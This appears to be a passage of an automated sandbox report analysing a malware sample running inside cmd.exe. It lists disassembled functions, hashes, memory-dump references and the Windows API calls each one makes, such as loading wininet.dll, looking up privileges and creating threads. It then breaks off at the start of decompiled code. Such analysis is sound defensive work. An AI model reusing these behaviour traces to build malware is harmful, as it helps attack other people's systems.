                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021EFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D7310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 224 d7310-d7352 call da040 227 d742c-d7432 224->227 228 d7358-d73a8 call da110 call c9b50 call d3e60 224->228 235 d73b0-d73c1 Sleep 228->235 236 d7426-d742a 235->236 237 d73c3-d73c9 235->237 236->227 236->235 238 d73cb-d73f1 call d6f40 237->238 239 d73f3-d7413 237->239 240 d7419-d741c 238->240 239->240 241 d7414 call d7140 239->241 240->236 241->240
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 000D73B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: 408f0e2930ec070a1369af3472174eaca8d8c7e3140b11ebac47cd0e3ffae472
                                                    • Instruction ID: 9bdc11cf809920f7f57a4ae8564a11938fb4612df208877aaaf25b46636c4135
                                                    • Opcode Fuzzy Hash: 408f0e2930ec070a1369af3472174eaca8d8c7e3140b11ebac47cd0e3ffae472
                                                    • Instruction Fuzzy Hash: 123160B6605704ABC715DF68C8A1FABB7B8AF48700F00851EFA1D5B342D770A555CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D730E, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 244 d730e-d7352 call da040 248 d742c-d7432 244->248 249 d7358-d73a8 call da110 call c9b50 call d3e60 244->249 256 d73b0-d73c1 Sleep 249->256 257 d7426-d742a 256->257 258 d73c3-d73c9 256->258 257->248 257->256 259 d73cb-d73f1 call d6f40 258->259 260 d73f3-d7413 258->260 261 d7419-d741c 259->261 260->261 262 d7414 call d7140 260->262 261->257 262->261
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 000D73B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: bce2b49ca6381590da6de176eca4b7cbd544058dc8492097a883c2b8f6a2f3b9
                                                    • Instruction ID: eddb085a3f849e85812268b31610dd39890db8200bd6968a41647600b07838aa
                                                    • Opcode Fuzzy Hash: bce2b49ca6381590da6de176eca4b7cbd544058dc8492097a883c2b8f6a2f3b9
                                                    • Instruction Fuzzy Hash: B6218FB1605705ABC711DF64C8A1FABBBB8EB48700F00801AFA1D5B382D774A555CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D88F4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 274 d88f4-d8917 call d91f0 276 d891c-d8931 RtlFreeHeap 274->276
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 5d58ff78646498cc288f8fadbf699a79543f0fd045a0aed82a5f67060e36384d
                                                    • Instruction ID: 71c4aee72af19a022d94c22017fbeacde15670ee14a21232c22d16c5d3106bba
                                                    • Opcode Fuzzy Hash: 5d58ff78646498cc288f8fadbf699a79543f0fd045a0aed82a5f67060e36384d
                                                    • Instruction Fuzzy Hash: 72E092A85552C59BDB01FF79D8C089B7BA4AF46214B14859EE89947207C121D419CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D8900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 277 d8900-d8916 278 d891c-d8931 RtlFreeHeap 277->278 279 d8917 call d91f0 277->279 279->278
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction ID: a09a808927de8b5db4223aa8d84cb0387547ad299f148ad1dc2a07eaf5f8e599
                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction Fuzzy Hash: 03E01AB52002096BD714DF59CC49EA777ACAF88750F014555BD0857242C630E910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000C7290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 286 c7290-c72da call da160 call dad40 call c9b50 call d3e60 295 c72dc-c72ee PostThreadMessageW 286->295 296 c730e-c7312 286->296 297 c730d 295->297 298 c72f0-c730b call c92b0 PostThreadMessageW 295->298 297->296 298->297
                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72EA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C730B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 08c144ccd6e6511b49fd51940520a8b86ee24fc330d29a0639c9a17bb1cfd4b9
                                                    • Instruction ID: 085055d1643b9fa34b5626daaa947cf68dea4609b12d34ba93c175a0706e2328
                                                    • Opcode Fuzzy Hash: 08c144ccd6e6511b49fd51940520a8b86ee24fc330d29a0639c9a17bb1cfd4b9
                                                    • Instruction Fuzzy Hash: 8401A231A8032877E721A7949C03FFE776C9B01B51F054119FF08BA2C2E6E46A0647F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D8A53, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFD2,000CCFD2,?,00000000,?,?), ref: 000D8A90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: f1b6e59386483dc231a00f1d6d274eb9ebb67aac36dba42ce7ce1c845d8777ce
                                                    • Instruction ID: 539a99fcf491363e2f1ad66a652984ec1757e68420f525e0b82cabdee0d4013b
                                                    • Opcode Fuzzy Hash: f1b6e59386483dc231a00f1d6d274eb9ebb67aac36dba42ce7ce1c845d8777ce
                                                    • Instruction Fuzzy Hash: 21115AB5240249ABDB14EFA8DC85EEB37A8EF84350F018456FD086B342CA30E910CBF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000C9B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9BC2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction ID: 4b6a0f307905f3e142f7084f47c6a00ddd43e02304578bbb6930d36c91a978c9
                                                    • Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction Fuzzy Hash: 880112B5D0020DBBDB10DBE4DD46FDDB7B89B54304F004199E90897241F671EB14CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D7433, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCD00,?,?), ref: 000D747C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: d1828e4f8ae4810727d8c2eb4a1360b7b1f85115e143d627e9122b9420113604
                                                    • Instruction ID: cf7933dc55a5f8f7f08beb381239aecb59381ae912ad5471fba721a9f5837497
                                                    • Opcode Fuzzy Hash: d1828e4f8ae4810727d8c2eb4a1360b7b1f85115e143d627e9122b9420113604
                                                    • Instruction Fuzzy Hash: 1EF0233228434439D73155B89C03FD77B9C8F96F54F54411AF94EAF2C2D6D5B8024765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D7440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCD00,?,?), ref: 000D747C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                    • Instruction ID: 68659aaa0ae2bbb2b94b4c6f239d6788449ad21b987144040fc94bf50338b65b
                                                    • Opcode Fuzzy Hash: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                    • Instruction Fuzzy Hash: 73E06D333803143AE2206599AC03FE7B39CCB91B20F544426FA0DEA2C2E5A5F80142A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000D8A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFD2,000CCFD2,?,00000000,?,?), ref: 000D8A90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction ID: bd8134f77993b986a84d60f935b6139e7de31ce009615d40c910f7aa16e2b180
                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction Fuzzy Hash: 4EE01AB52002086BDB10DF49CC85EE737ADAF88750F018155BE0857242C930E8108BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000CD437, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C93,?), ref: 000CD46B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: d32e0cab7a2422f5e47fb85db222f64c917be99a300e41dde4daf3931a5a2c72
                                                    • Instruction ID: 3466e0ccd0f3d377d9f77a1c2e8d5b8184a7aac1c6228f4ecbfaa7bd20fcb020
                                                    • Opcode Fuzzy Hash: d32e0cab7a2422f5e47fb85db222f64c917be99a300e41dde4daf3931a5a2c72
                                                    • Instruction Fuzzy Hash: 8FD05E667503042AEA10EFA49D0BF66268A6B5A700F098869F54AEB3C3D929E5158121
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 000CD440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C93,?), ref: 000CD46B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction ID: 57e9d1a17ed2f296dc728d8530f43ded611a469849cf806162e94de69177d6c8
                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction Fuzzy Hash: F3D05E617503082BE610ABA89C03F6632C85B55B00F494064FA49973C3D960E5014161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 02218788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E02218788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
